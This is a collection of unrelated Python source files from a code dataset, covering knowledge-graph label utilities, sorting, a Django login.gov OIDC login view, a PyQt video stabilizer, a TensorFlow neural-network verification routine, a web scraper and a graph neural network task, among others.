# -*- coding: utf-8 -*-
import numpy as np
from typing import Dict
from kupp.triples_preprocessing_utils.basic_triple_utils import slice_triples
def create_multi_label_relation_instances(unique_entity_pairs: np.array,
triples: np.array,
num_relations: int,
create_class_other=False
) -> Dict[tuple, np.array]:
"""Create for each (s,o) pair the multi relation label."""
subjects, relations, objects = slice_triples(triples)
entity_pairs = np.concatenate([subjects, objects], axis=1)
# Create class 'other' for relations not contained in the KG
if create_class_other:
num_relations += 1
s_t_to_multi_relations = create_multi_label_instances(unique_pairs=unique_entity_pairs,
pairs=entity_pairs,
elements=relations,
num_elements=num_relations)
return s_t_to_multi_relations
def create_multi_label_objects_instance(unique_s_r_pairs: np.array,
triples: np.array,
num_entities: int, ) -> Dict[tuple, np.array]:
"""Create for each (s,r) pair the multi object label."""
subjects, relations, objects = slice_triples(triples)
s_r_pairs = np.concatenate([subjects, relations], axis=1)
    s_r_to_multi_objects = create_multi_label_instances(unique_pairs=unique_s_r_pairs,
                                                        pairs=s_r_pairs,
                                                        elements=objects,
                                                        num_elements=num_entities)
    return s_r_to_multi_objects
def create_multi_label_instances(unique_pairs: np.array,
pairs: np.array,
elements: np.array,
num_elements) -> Dict[tuple, np.array]:
"""Create for each (element_1, element_2) pair the multi-label."""
instance_to_multi_label = {}
for unique_pair in unique_pairs:
# Step 1: Get all corresponding elements of pair
indices = np.where((pairs == unique_pair).all(-1))
all_corresponding_elements_of_pair = np.array(np.sort(elements[indices]).tolist(), dtype=np.int)
# Step 2: Create hot encoding labels
multi_label = np.zeros(num_elements)
np.put(multi_label, all_corresponding_elements_of_pair, np.ones(len(all_corresponding_elements_of_pair)))
# Step 3: Save in dict
instance_to_multi_label[tuple(unique_pair)] = multi_label
return instance_to_multi_label
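

# Minimal usage sketch with toy arrays (shapes assumed to mirror slice_triples
# output, i.e. column vectors); pair (0, 1) occurs with relations 0 and 2:
if __name__ == '__main__':
    pairs = np.array([[0, 1], [0, 1], [2, 3]])
    elements = np.array([[0], [2], [1]])
    unique_pairs = np.array([[0, 1], [2, 3]])
    labels = create_multi_label_instances(unique_pairs, pairs, elements, num_elements=4)
    print(labels[(0, 1)])  # -> [1. 0. 1. 0.]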
|
StarcoderdataPython
|
28944
|
def bolha_curta(lista):
    fim = len(lista)
    for i in range(fim - 1, 0, -1):
        trocou = False
        for j in range(i):
            if lista[j] > lista[j + 1]:
                lista[j], lista[j + 1] = lista[j + 1], lista[j]
                trocou = True
        if not trocou:
            return
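

# Quick demonstration (added for illustration):
numeros = [5, 1, 4, 2, 3]
bolha_curta(numeros)
print(numeros)  # [1, 2, 3, 4, 5]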
|
StarcoderdataPython
|
5150607
|
"""Login.gov/authorize is redirected to this endpoint to start a django user session."""
import logging
from django.conf import settings
from django.contrib.auth import get_user_model, login
from django.core.exceptions import SuspiciousOperation
from django.http import HttpResponseRedirect
from django.utils import timezone
import jwt
import requests
from rest_framework import status
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.response import Response
from ..authentication import CustomAuthentication
from .utils import (
get_nonce_and_state,
generate_token_endpoint_parameters,
generate_jwt_from_jwks,
validate_nonce_and_state,
response_redirect,
)
logger = logging.getLogger()
logger.setLevel(logging.INFO)
class InactiveUser(Exception):
"""Inactive User Error Handler."""
pass
class TokenAuthorizationOIDC(ObtainAuthToken):
"""Define methods for handling login request from login.gov."""
@staticmethod
def decode_payload(id_token, options=None):
"""Decode the payload."""
if not options:
options = {'verify_nbf': False}
cert_str = generate_jwt_from_jwks()
# issuer: issuer of the response
# subject : UUID - not useful for login.gov set options to ignore this
try:
decoded_payload = jwt.decode(
id_token,
key=cert_str,
issuer=settings.LOGIN_GOV_ISSUER,
audience=settings.LOGIN_GOV_CLIENT_ID,
algorithms=["RS256"],
subject=None,
access_token=None,
options=options,
)
return decoded_payload
except jwt.ExpiredSignatureError:
return {"error": "The token is expired."}
def handle_user(self, request, id_token, decoded_payload):
"""Handle the incoming user."""
# get user from database if they exist. if not, create a new one
if "token" not in request.session:
request.session["token"] = id_token
# Authenticate users with the unique "subject" `sub` UUID from the payload.
sub = decoded_payload["sub"]
email = decoded_payload["email"]
# First account for the initial superuser
if email == settings.DJANGO_SUPERUSER_NAME:
# If this is the initial login for the initial superuser,
# we must authenticate with their username since we have yet to save the
# user's `sub` UUID from the decoded payload, with which we will
# authenticate later.
initial_user = CustomAuthentication.authenticate(
self, username=email
)
if initial_user.login_gov_uuid is None:
# Save the `sub` to the superuser.
initial_user.login_gov_uuid = sub
initial_user.save()
# Login with the new superuser.
self.login_user(request, initial_user, "User Found")
return initial_user
        # Authenticate with `sub` and not username, as users can change their
# corresponding emails externally.
user = CustomAuthentication.authenticate(
self, user_id=sub
)
if user and user.is_active:
# User's are able to update their emails on login.gov
# Update the User with the latest email from the decoded_payload.
if user.username != email:
user.email = email
user.username = email
user.save()
if user.deactivated:
self.login_user(request, user, "Inactive User Found")
else:
self.login_user(request, user, "User Found")
elif user and not user.is_active:
raise InactiveUser(
f'Login failed, user account is inactive: {user.username}'
)
else:
User = get_user_model()
user = User.objects.create_user(email, email=email, login_gov_uuid=sub)
user.set_unusable_password()
user.save()
self.login_user(request, user, "User Created")
return user
def login_user(self, request, user, user_status):
"""Create a session for the associated user."""
login(
request,
user,
backend="tdpservice.users.authentication.CustomAuthentication",
)
        logger.info("%s: %s on %s", user_status, user.username, timezone.now())
def get(self, request, *args, **kwargs):
"""Handle decoding auth token and authenticate user."""
code = request.GET.get("code", None)
state = request.GET.get("state", None)
if code is None:
logger.info("Redirecting call to main page. No code provided.")
return HttpResponseRedirect(settings.FRONTEND_BASE_URL)
if state is None:
logger.info("Redirecting call to main page. No state provided.")
return HttpResponseRedirect(settings.FRONTEND_BASE_URL)
# get the validation keys to confirm generated nonce and state
nonce_and_state = get_nonce_and_state(request.session)
nonce_validator = nonce_and_state.get("nonce", "not_nonce")
state_validator = nonce_and_state.get("state", "not_state")
# build out the query string parameters
# and full URL path for OIDC token endpoint
token_params = generate_token_endpoint_parameters(code)
token_endpoint = settings.LOGIN_GOV_TOKEN_ENDPOINT + "?" + token_params
token_response = requests.post(token_endpoint)
if token_response.status_code != 200:
return Response(
{
"error": (
"Invalid Validation Code Or OpenID Connect Authenticator "
"Down!"
)
},
status=status.HTTP_400_BAD_REQUEST,
)
token_data = token_response.json()
id_token = token_data.get("id_token")
decoded_payload = self.decode_payload(id_token)
if decoded_payload == {"error": "The token is expired."}:
return Response(decoded_payload, status=status.HTTP_401_UNAUTHORIZED)
decoded_nonce = decoded_payload["nonce"]
if not validate_nonce_and_state(
decoded_nonce, state, nonce_validator, state_validator
):
msg = "Could not validate nonce and state"
raise SuspiciousOperation(msg)
if not decoded_payload["email_verified"]:
return Response(
{"error": "Unverified email!"}, status=status.HTTP_400_BAD_REQUEST
)
try:
user = self.handle_user(request, id_token, decoded_payload)
return response_redirect(user, id_token)
except InactiveUser as e:
logger.exception(e)
return Response(
{
"error": str(e)
},
status=status.HTTP_401_UNAUTHORIZED
)
except Exception as e:
logger.exception(f"Error attempting to login/register user: {e} at...")
return Response(
{
"error": (
"Email verified, but experienced internal issue "
"with login/registration."
)
},
status=status.HTTP_400_BAD_REQUEST,
)
|
StarcoderdataPython
|
53103
|
<gh_stars>0
from typing import Optional


# Minimal TreeNode stub so the snippet runs standalone
# (LeetCode normally supplies this definition):
class TreeNode:
    def __init__(self, val=0, left=None, right=None):
        self.val = val
        self.left = left
        self.right = right


class Solution:
# Iterative
def invertTree(self, root: Optional[TreeNode]) -> Optional[TreeNode]:
if not root:
return None
stack = [root]
while len(stack) > 0:
currentNode = stack.pop()
currentNode.left, currentNode.right = currentNode.right, currentNode.left
if currentNode.left is not None:
stack.append(currentNode.left)
if currentNode.right is not None:
stack.append(currentNode.right)
return root
# Recursive
def invertTree(self, root: Optional[TreeNode]) -> Optional[TreeNode]:
if not root:
return None
root.left, root.right = root.right, root.left
self.invertTree(root.left)
self.invertTree(root.right)
return root
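

# Quick sketch using the stub above; the recursive definition is the one in
# effect, since it is declared last and overrides the iterative one.
if __name__ == "__main__":
    root = TreeNode(1, TreeNode(2), TreeNode(3))
    inverted = Solution().invertTree(root)
    print(inverted.left.val, inverted.right.val)  # 3 2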
|
StarcoderdataPython
|
5010030
|
<filename>Important/print_primeList.py
for n in range(2, 101):
    prime = True
    for i in range(2, n):
        if n % i == 0:
            prime = False
            break
    if prime:
        print n
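# With the n % i check this prints every prime up to 100: 2, 3, 5, 7, ..., 97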
|
StarcoderdataPython
|
8060389
|
<gh_stars>0
"""
The Update super class
"""
from Product.Database.DBConn import create_session
class Update:
"""
Author: <NAME>, <NAME>
Date: 9/11/2017
Last update: 13/11/2017
    Purpose: Its subclasses should be used to update the database
"""
def __init__(self):
"""
Author: <NAME>, <NAME>
Date: 2017-11-10
Last update:
Purpose:
        The constructor of the Update class; creates a session to be used by subclasses
"""
self.session = create_session()
|
StarcoderdataPython
|
6412906
|
<filename>tests/test_dnssec_api.py
import unittest
from namecom import DnssecApi, exceptions
from .sample import (
correct_auth,
dnssec_sample1 as sample1,
dnssec_sample2 as sample2
)
api = DnssecApi(domainName=sample1.domainName, auth=correct_auth, use_test_env=True)
class DnssecApiTestCase(unittest.TestCase):
def test_list_dnssec(self):
result = api.list_dnssecs()
dnssecs = result.dnssecs
self.assertIn(sample2, dnssecs)
def test_get_dnssec(self):
result = api.get_dnssec(sample2.digest)
dnssec = result.dnssec
self.assertEqual(dnssec, sample2)
def test_create_delete_dnssec(self):
# cleanup existing data
try:
api.delete_dnssec(sample1.digest)
except exceptions.NamecomError:
pass
result = api.create_dnssec(
keyTag=sample1.keyTag,
algorithm=sample1.algorithm,
digestType=sample1.digestType,
digest=sample1.digest
)
dnssec = result.dnssec
self.assertEqual(dnssec, sample1)
result = api.delete_dnssec(sample1.digest)
self.assertEqual(result.status_code, 200)
|
StarcoderdataPython
|
1615147
|
<gh_stars>100-1000
load(":flake8_config.bzl", "Flake8Info")
def _flake8_impl(ctx):
srcs = extract_files(ctx.attr.srcs)
file_paths = short_paths(srcs)
config = ctx.attr.lint_config[Flake8Info].config_file.files.to_list()[0]
test = [
"#!/usr/bin/env bash",
"echo \"{bin} --config {config} {files}\"".format(
bin = ctx.executable._flake8_cli.short_path,
config = config.short_path,
files = " ".join(file_paths),
),
"{bin} --config {config} {files}".format(
bin = ctx.executable._flake8_cli.short_path,
config = config.short_path,
files = " ".join(file_paths),
),
]
out = ctx.actions.declare_file(ctx.label.name + "_exec")
ctx.actions.write(
output = out,
content = "\n".join(test),
)
runfiles = ctx.runfiles(
files = srcs + [config],
)
runfiles = runfiles.merge(ctx.attr._flake8_cli[DefaultInfo].default_runfiles)
return [
DefaultInfo(
executable = out,
runfiles = runfiles,
),
]
flake8_test = rule(
implementation = _flake8_impl,
attrs = {
"srcs": attr.label_list(allow_files = True),
"lint_config": attr.label(
providers = [
Flake8Info,
],
),
"_flake8_cli": attr.label(
cfg = "host",
default = "//lint/private/python:flake8",
providers = [
DefaultInfo,
],
executable = True,
),
},
executable = True,
test = True,
)
def extract_files(srcs):
filtered = []
for s in srcs:
files = s.files.to_list()
for f in files:
if f.dirname.startswith("external"):
continue
filtered.append(f)
return filtered
def short_paths(files):
sn = []
for f in files:
sn.append(f.short_path)
return sn
|
StarcoderdataPython
|
11249307
|
import cv2
from PyQt5.QtWidgets import QMainWindow, QFileDialog
from PyQt5.QtCore import QThread, pyqtSignal
from .configScreen import ConfigScreen
from .resultScreen import ResultScreen
from .titleScreen import TitleScreen
from .loadingScreen import LoadingScreen
from src.tracker import Tracker
from src.stabilizer import Stabilizer
import src.converter as video_utils
import tempfile
import shutil
class MainWindow(QMainWindow):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent)
self.setFixedSize(1280, 720)
self.title_screen = TitleScreen()
self.config_screen = ConfigScreen()
self.loading_screen = LoadingScreen()
self.result_screen = ResultScreen()
self.start_title_screen()
def start_config_screen(self):
self.config_screen.video_path = self.input_file_path
self.config_screen.setup_ui(self)
self.config_screen.button_cancel.clicked.connect(self.return_to_title_screen)
self.config_screen.button_select.clicked.connect(self._roi_selection)
self.show()
def start_result_screen(self):
self.result_screen.video_path = self.output_file_path
self.result_screen.setup_ui(self)
self.result_screen.button_restart.clicked.connect(self.close_result_screen)
self.result_screen.button_close.clicked.connect(self.close)
def close_result_screen(self):
self.result_screen._stop()
self.start_title_screen()
def return_to_title_screen(self):
self.config_screen._stop()
self.start_title_screen()
def start_title_screen(self):
self.title_screen.setup_ui(self)
self.title_screen.button_select.clicked.connect(self._selectFile)
self.show()
def _selectFile(self):
self.input_file_path, _ = QFileDialog.getOpenFileName(self, "Select file", "",
"Movie files (*.mp4 *.avi *.wmv *.mov *.mkv)")
if self.input_file_path != "":
self.start_config_screen()
def _roi_selection(self):
self.config_screen.button_select.clicked.disconnect(self._roi_selection)
self.config_screen._force_stop()
is_manual_enabled = self.config_screen.radio_manual_object_selection.isChecked()
self.video_capture = video_utils.create_video_capture(self.input_file_path)
video_frames = video_utils.video_to_frame_list(self.video_capture)
if is_manual_enabled:
self.tracker = Tracker(video_frames)
else:
self.tracker = Tracker(video_frames, yolo=True)
if self.tracker.bbox != (0, 0, 0, 0):
self.stabilize_file(self.config_screen.radius_slider.value())
else:
self.config_screen.button_select.clicked.connect(self._roi_selection)
def _getTrackingMode(self):
modes = ["CSRT", "KCF", "MOSSE"]
radios = [self.config_screen.radio_CSRT, self.config_screen.radio_KCF, self.config_screen.radio_MOSSE]
for i, radio in enumerate(radios):
if radio.isChecked():
return modes[i]
def stabilize_file(self, radius):
self.start_loading_screen()
self.output_options = {
'audio': self.config_screen.checkbox_audio.isChecked(),
'greyscale': self.config_screen.checkbox_greyscale.isChecked(),
'compress': self.config_screen.checkbox_compress.isChecked(),
'plots': self.config_screen.checkbox_plots.isChecked()
}
self.worker = Worker(self.tracker, self._getTrackingMode(), radius, self.output_options['plots'],
self.config_screen.checkbox_show_tracking.isChecked())
self.worker.start()
self.worker.started_tracking.connect(self._started_tracking)
self.worker.started_stabilizing.connect(self._started_stabilizing)
self.worker.finished_tracking.connect(self._finished_tracking)
self.worker.finished_stabilizing.connect(self._finished_stabilizing)
self.worker.err_sig.connect(self.stabilization_error)
def _started_tracking(self):
self.loading_screen.append_text("Tracking...")
def _started_stabilizing(self):
self.loading_screen.append_text("Stabilizing...")
def _finished_tracking(self):
self.loading_screen.append_text("Tracking completed.")
def _finished_stabilizing(self):
self.loading_screen.append_text("Stabilizing completed.")
self.output_file_path = ""
while self.output_file_path == "":
self.output_file_path, _ = QFileDialog.getSaveFileName(self, "Save file", "", "All Files (*)")
if self.output_options['greyscale']:
video_utils.convert_frames_to_greyscale(self.tracker.frames)
if self.output_options['audio'] and video_utils.contains_audio(self.input_file_path):
tempdir_path = tempfile.mkdtemp()
tempfile_name = tempdir_path + "\\tempfile.mp4"
video_utils.write_video_to_file(tempfile_name, self.tracker.frames, self.video_capture.get(cv2.CAP_PROP_FPS),
iscolor=not self.output_options['greyscale'])
video_utils.mux_video_audio(tempfile_name, self.input_file_path, self.output_file_path)
shutil.rmtree(tempdir_path)
else:
if self.output_options['compress']:
video_utils.write_video_to_file(self.output_file_path, self.tracker.frames,
self.video_capture.get(cv2.CAP_PROP_FPS),
not self.output_options['greyscale'])
video_utils.repack_video(self.output_file_path)
else:
video_utils.write_video_to_file(self.output_file_path, self.tracker.frames,
self.video_capture.get(cv2.CAP_PROP_FPS),
not self.output_options['greyscale'])
self.loading_screen.append_text(f"Saved output as {self.output_file_path}")
self.start_result_screen()
def stabilization_error(self, e):
self.loading_screen.append_text("ERROR: " + str(e))
def start_loading_screen(self):
self.loading_screen.setup_ui(self)
self.loading_screen.button_cancel.clicked.connect(self.return_to_title_screen)
self.show()
class Worker(QThread):
started_tracking = pyqtSignal()
finished_tracking = pyqtSignal()
started_stabilizing = pyqtSignal()
finished_stabilizing = pyqtSignal()
err_sig = pyqtSignal(str)
def __init__(self, tracker, tracking_mode, smoothing_radius, generate_plots, show_tracking):
super(QThread, self).__init__()
self.tracker = tracker
self.tracking_mode = tracking_mode
self.smoothing_radius = smoothing_radius
self.generate_plots = generate_plots
self.show_tracking = show_tracking
def run(self):
try:
self.started_tracking.emit()
self.tracker.tracking_data = self.tracker.track(self.tracking_mode, self.show_tracking)
self.finished_tracking.emit()
self.started_stabilizing.emit()
self.stabilizer = Stabilizer(self.tracker.frames, self.tracker.tracking_data)
self.stabilizer.stabilize(self.smoothing_radius, self.generate_plots)
self.finished_stabilizing.emit()
except Exception as e:
self.err_sig.emit(str(e))
|
StarcoderdataPython
|
6576805
|
<gh_stars>1000+
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Dual functions."""
import tensorflow.compat.v1 as tf
def get_I(l, u):
# l,u are None, n_layer tensors
# Ip: active relu units
# I: unstable relu units
Ip = tf.where(
tf.logical_and(tf.greater_equal(l, 0.), tf.greater(u, 0.)),
tf.ones_like(u), tf.zeros_like(u))
I = tf.where(
tf.logical_and(tf.greater(u, 0.), tf.less(l, 0.)), tf.ones_like(u),
tf.zeros_like(u))
return Ip, I
def get_D(l, u, Ip, I):
# D matrix for each layer
D = Ip + tf.where(tf.greater(I, 0.5), tf.divide(u, u - l), tf.zeros_like(I))
return D
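

# Worked scalar example of the relaxation above (illustration, not in the
# original): an unstable ReLU with bounds l = -1, u = 2 has Ip = 0, I = 1,
# and D = u / (u - l) = 2 / 3, the slope of the standard linear ReLU relaxation.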
def create_dual_approx(num_layers, batch_size, action_max, W_T_list, b_T_list,
action_tensor_center, return_full_info=False):
#layers_n: number of hidden units each layer
#W_T_list, b_T_list: multiplicatie and bias weights for each layer
#action_tensor_center: raw input, y: one-hot encoding of labels
# List of bounds (l_i,u_i) for i = 2,...,K-1
l_list = [tf.zeros_like(action_tensor_center)]
u_list = [tf.zeros_like(action_tensor_center)]
# List of transition matrices D_i for i = 2,...,K-1
D_list = [tf.zeros_like(action_tensor_center)]
# Indicators of spanning ReLu neurons for i = 2,...,K-1
I_list = [tf.zeros_like(action_tensor_center)]
# Indicators of active ReLu neurons for i = 2,...,K-1
Ip_list = [tf.zeros_like(action_tensor_center)]
# Final list of duals nu_i for i = 2,...,K-1
Nu_list = [tf.zeros([batch_size, W_T_list[0].get_shape().as_list()[1], 1])]
# Initialize Nu_K
Nu_K = -tf.expand_dims(-tf.eye(1), axis=-1)
# Final list of b_i'*nu_{i+1} for i = 1,...,K-1
gamma_list = [b_T_list[0]]
# Pre-compute bounds for layer 2
# Initialize Nu_hat_1
Nu_hat_1 = tf.tile(tf.expand_dims(W_T_list[0], axis=0), [batch_size, 1, 1])
# Initialize bounds
l_2 = tf.matmul(action_tensor_center,
W_T_list[0]) + gamma_list[0] - action_max * tf.norm(
Nu_hat_1, 1, axis=1, keepdims=False)
u_2 = tf.matmul(action_tensor_center,
W_T_list[0]) + gamma_list[0] + action_max * tf.norm(
Nu_hat_1, 1, axis=1, keepdims=False)
# Add to list (store in vector format)
l_list.append(l_2)
u_list.append(u_2)
# Recursion
for i in range(2, num_layers):
# form Ip, I
Ip_i, I_i = get_I(l_list[i - 1], u_list[i - 1])
I_list.append(I_i)
Ip_list.append(Ip_i)
# form D
D_i = get_D(l_list[i - 1], u_list[i - 1], Ip_i, I_i)
D_list.append(D_i)
# initialize nu_i
Nu_list.append(tf.einsum('ij,jk->ijk', D_i, W_T_list[i - 1]))
# initialize gamma_i
gamma_list.append(b_T_list[i - 1])
# if final iteration, update with Nu_K
if i == num_layers - 1:
Nu_K = tf.tile(Nu_K, [Nu_list[i - 1].get_shape().as_list()[0], 1, 1])
Nu_list[i - 1] = tf.einsum('ijk,ikm->ijm', Nu_list[i - 1], Nu_K)
gamma_list[i - 1] = tf.einsum('ij,ijm->im', gamma_list[i - 1], Nu_K)
# initialize next layer bounds
l_ip1 = tf.einsum('ij,ijm->im', l_list[i - 1] * I_list[i - 1],
tf.nn.relu(-Nu_list[i - 1]))
u_ip1 = -tf.einsum('ij,ijm->im', l_list[i - 1] * I_list[i - 1],
tf.nn.relu(Nu_list[i - 1]))
# update nu for layers i-1,...,2
for j in range(i - 1, 1, -1):
Nu_hat_j = tf.einsum('jk,ikm->ijm', W_T_list[j - 1], Nu_list[j])
Nu_list[j - 1] = tf.einsum('ij,ijk->ijk', D_list[j - 1], Nu_hat_j)
l_ip1 = tf.add(
l_ip1,
tf.einsum('ij,ijm->im', l_list[j - 1] * I_list[j - 1],
tf.nn.relu(-Nu_list[j - 1])))
u_ip1 = tf.subtract(
u_ip1,
tf.einsum('ij,ijm->im', l_list[j - 1] * I_list[j - 1],
tf.nn.relu(Nu_list[j - 1])))
# update nu_hat_1
Nu_hat_1 = tf.einsum('jk,ikm->ijm', W_T_list[0], Nu_list[1])
# start sum
psi = tf.einsum('ij,ijm->im', action_tensor_center,
Nu_hat_1) + gamma_list[i - 1]
# update gamma for layers 1,...,i-1
for j in range(1, i):
gamma_list[j - 1] = tf.einsum('ij,ijm->im', b_T_list[j - 1], Nu_list[j])
psi = tf.add(psi, gamma_list[j - 1])
Nu_hat_1_norm = tf.norm(Nu_hat_1, 1, axis=1, keepdims=False)
if i < num_layers - 1:
# finalize bounds
l_ip1 = tf.add(l_ip1, psi - action_max * Nu_hat_1_norm)
u_ip1 = tf.add(u_ip1, psi + action_max * Nu_hat_1_norm)
# add to list
l_list.append(l_ip1)
u_list.append(u_ip1)
else:
# compute J_tilde
J_tilde = -psi - action_max * Nu_hat_1_norm - u_ip1
if return_full_info:
return (-J_tilde, l_list, u_list, D_list, Nu_list, gamma_list, psi, l_ip1,
u_ip1, Nu_hat_1)
else:
return -J_tilde
|
StarcoderdataPython
|
3208209
|
my_string = 'we are fine.'
def replace_space(my_str):
my_str = str(my_str)
new = '%20'.join(my_str.split(' '))
print(new)
replace_space(my_string)
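# Expected output for the string above: we%20are%20fine.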
|
StarcoderdataPython
|
247741
|
from bs4 import BeautifulSoup as Soup
from muse.util import HeadlessChrome
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
import time
SITE_URL = 'http://www.melon.com'
REAL_TIME_CHART = '{0}/chart/index.htm'.format(SITE_URL)
"""
Module for
melon music chart API
Attribute:
SITE_URL: Path for melon web site
REAL_TIME_CHART: Path for melon real time chart page
"""
def get_real_time_chart_songs():
"""
Get top 100 songs
from melon real time chart
Return:
list: top 100 songs from melon real time chart
"""
songs = []
with HeadlessChrome() as chrome:
chrome.get(REAL_TIME_CHART)
wait = WebDriverWait(chrome, 10)
wait.until(EC.visibility_of_element_located((By.CSS_SELECTOR, 'tr.lst50, tr.lst100')))
soup = Soup(chrome.page_source, 'html.parser')
time.sleep(0.5)
for row in soup.select('tr.lst50, tr.lst100'):
song = {
'rank': row.select('span.rank')[0].get_text().strip(),
'title': row.select('div.rank01')[0].get_text().strip(),
'artist': row.select('div.rank02 > span.checkEllipsis')[0].get_text().strip(),
'album': row.select('div.rank03')[0].get_text().strip()
}
songs.append(song)
return songs
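

# Example usage (assumes Chrome, a matching driver, and network access):
if __name__ == '__main__':
    for song in get_real_time_chart_songs()[:3]:
        print('{rank}. {title} - {artist} ({album})'.format(**song))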
|
StarcoderdataPython
|
3514748
|
<filename>tasks/citation_network_task.py
from collections import namedtuple
from typing import Any, Dict, List, Iterable, Iterator
import numpy as np
import tensorflow as tf
from dpu_utils.utils import RichPath, LocalPath
from .sparse_graph_task import Sparse_Graph_Task, DataFold, MinibatchData
from utils.citation_network_utils import load_data, preprocess_features
CitationData = namedtuple('CitationData', ['adj_lists', 'num_incoming_edges', 'features', 'labels', 'mask'])
class Citation_Network_Task(Sparse_Graph_Task):
@classmethod
def default_params(cls):
params = super().default_params()
params.update({
'add_self_loop_edges': True,
'use_graph': True,
'activation_function': "tanh",
'out_layer_dropout_keep_prob': 1.0,
})
return params
@staticmethod
def name() -> str:
return "CitationNetwork"
@staticmethod
def default_data_path() -> str:
return "data/citation-networks"
def __init__(self, params: Dict[str, Any]):
super().__init__(params)
# Things that will be filled once we load data:
self.__num_edge_types = 2
self.__initial_node_feature_size = 0
self.__num_output_classes = 0
def get_metadata(self) -> Dict[str, Any]:
metadata = super().get_metadata()
metadata['initial_node_feature_size'] = self.__initial_node_feature_size
metadata['num_output_classes'] = self.__num_output_classes
return metadata
def restore_from_metadata(self, metadata: Dict[str, Any]) -> None:
super().restore_from_metadata(metadata)
self.__initial_node_feature_size = metadata['initial_node_feature_size']
self.__num_output_classes = metadata['num_output_classes']
@property
def num_edge_types(self) -> int:
return self.__num_edge_types
@property
def initial_node_feature_size(self) -> int:
return self.__initial_node_feature_size
# -------------------- Data Loading --------------------
def load_data(self, path: RichPath) -> None:
train_data, valid_data, _ = self.__load_data(path)
self._loaded_data[DataFold.TRAIN] = train_data
self._loaded_data[DataFold.VALIDATION] = valid_data
def load_eval_data_from_path(self, path: RichPath) -> Iterable[Any]:
_, _, test_data = self.__load_data(path)
return test_data
def __load_data(self, data_directory: RichPath):
assert isinstance(data_directory, LocalPath), "CitationNetworkTask can only handle local data"
data_path = data_directory.path
print(" Loading CitationNetwork data from %s." % (data_path,))
(adj_list, features, train_labels, valid_labels, test_labels, train_mask, valid_mask, test_mask) = \
load_data(data_path, self.params['data_kind'])
self.__initial_node_feature_size = features.shape[1]
self.__num_output_classes = train_labels.shape[1]
features = preprocess_features(features)
train_data = \
[self.__preprocess_data(adj_list, features, np.argmax(train_labels, axis=1), train_mask)]
valid_data = \
[self.__preprocess_data(adj_list, features, np.argmax(valid_labels, axis=1), valid_mask)]
test_data = \
[self.__preprocess_data(adj_list, features, np.argmax(test_labels, axis=1), test_mask)]
return train_data, valid_data, test_data
def __preprocess_data(self, adj_list: Dict[int, List[int]], features, labels, mask) -> CitationData:
flat_adj_list = []
self_loop_adj_list = []
num_incoming_edges = np.zeros(shape=[len(adj_list)], dtype=np.int32)
for node, neighbours in adj_list.items():
for neighbour in neighbours:
flat_adj_list.append((node, neighbour))
flat_adj_list.append((neighbour, node))
num_incoming_edges[neighbour] += 1
num_incoming_edges[node] += 1
self_loop_adj_list.append((node, node))
# Prepend the self-loop information:
num_incoming_edges = np.stack([np.ones_like(num_incoming_edges, dtype=np.int32),
num_incoming_edges]) # Shape [2, V]
return CitationData(adj_lists=[self_loop_adj_list, flat_adj_list],
num_incoming_edges=num_incoming_edges,
features=features,
labels=labels,
mask=mask)
# -------------------- Model Construction --------------------
def make_task_output_model(self,
placeholders: Dict[str, tf.Tensor],
model_ops: Dict[str, tf.Tensor],
) -> None:
placeholders['labels'] = tf.placeholder(tf.int32, [None], name='labels')
placeholders['mask'] = tf.placeholder(tf.float32, [None], name='mask')
placeholders['out_layer_dropout_keep_prob'] =\
tf.placeholder_with_default(input=tf.constant(1.0, dtype=tf.float32),
shape=[],
name='out_layer_dropout_keep_prob')
final_node_representations = \
tf.nn.dropout(model_ops['final_node_representations'],
rate=1.0 - placeholders['out_layer_dropout_keep_prob'])
output_label_logits = \
tf.keras.layers.Dense(units=self.__num_output_classes,
use_bias=False,
activation=None,
name="OutputDenseLayer",
)(final_node_representations) # Shape [V, Classes]
num_masked_preds = tf.reduce_sum(placeholders['mask'])
losses = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=output_label_logits,
labels=placeholders['labels'])
total_loss = tf.reduce_sum(losses * placeholders['mask'])
correct_preds = tf.equal(tf.argmax(output_label_logits, axis=1, output_type=tf.int32),
placeholders['labels'])
num_masked_correct = tf.reduce_sum(tf.cast(correct_preds, tf.float32) * placeholders['mask'])
accuracy = num_masked_correct / num_masked_preds
tf.summary.scalar('accuracy', accuracy)
model_ops['task_metrics'] = {
'loss': total_loss / num_masked_preds,
'total_loss': total_loss,
'accuracy': accuracy,
}
# -------------------- Minibatching and training loop --------------------
def make_minibatch_iterator(self,
data: Iterable[Any],
data_fold: DataFold,
model_placeholders: Dict[str, tf.Tensor],
max_nodes_per_batch: int) \
-> Iterator[MinibatchData]:
data = next(iter(data)) # type: CitationData
if data_fold == DataFold.TRAIN:
out_layer_dropout_keep_prob = self.params['out_layer_dropout_keep_prob']
else:
out_layer_dropout_keep_prob = 1.0
feed_dict = {
model_placeholders['initial_node_features']: data.features,
model_placeholders['adjacency_lists'][0]: data.adj_lists[0],
model_placeholders['adjacency_lists'][1]: data.adj_lists[1],
model_placeholders['type_to_num_incoming_edges']: data.num_incoming_edges,
model_placeholders['num_graphs']: 1,
model_placeholders['labels']: data.labels,
model_placeholders['mask']: data.mask,
model_placeholders['out_layer_dropout_keep_prob']: out_layer_dropout_keep_prob,
}
yield MinibatchData(feed_dict=feed_dict,
num_graphs=1,
num_nodes=data.features.shape[0],
num_edges=sum(len(adj_list) for adj_list in data.adj_lists))
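    # Note: this task is trained transductively, so the iterator above yields
    # the whole citation graph as a single "minibatch" and relies on the mask
    # placeholder to restrict the loss to the current fold's nodes.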
def early_stopping_metric(self, task_metric_results: List[Dict[str, np.ndarray]], num_graphs: int) -> float:
# Early stopping based on average loss:
return np.sum([m['total_loss'] for m in task_metric_results]) / num_graphs
def pretty_print_epoch_task_metrics(self, task_metric_results: List[Dict[str, np.ndarray]], num_graphs: int) -> str:
return "Acc: %.2f%%" % (task_metric_results[0]['accuracy'] * 100,)
|
StarcoderdataPython
|
6475641
|
"""
pipenv run python -m unittest tests.unit.test_formCreate
"""
import unittest
from tests.integration.constants import _
from app import app
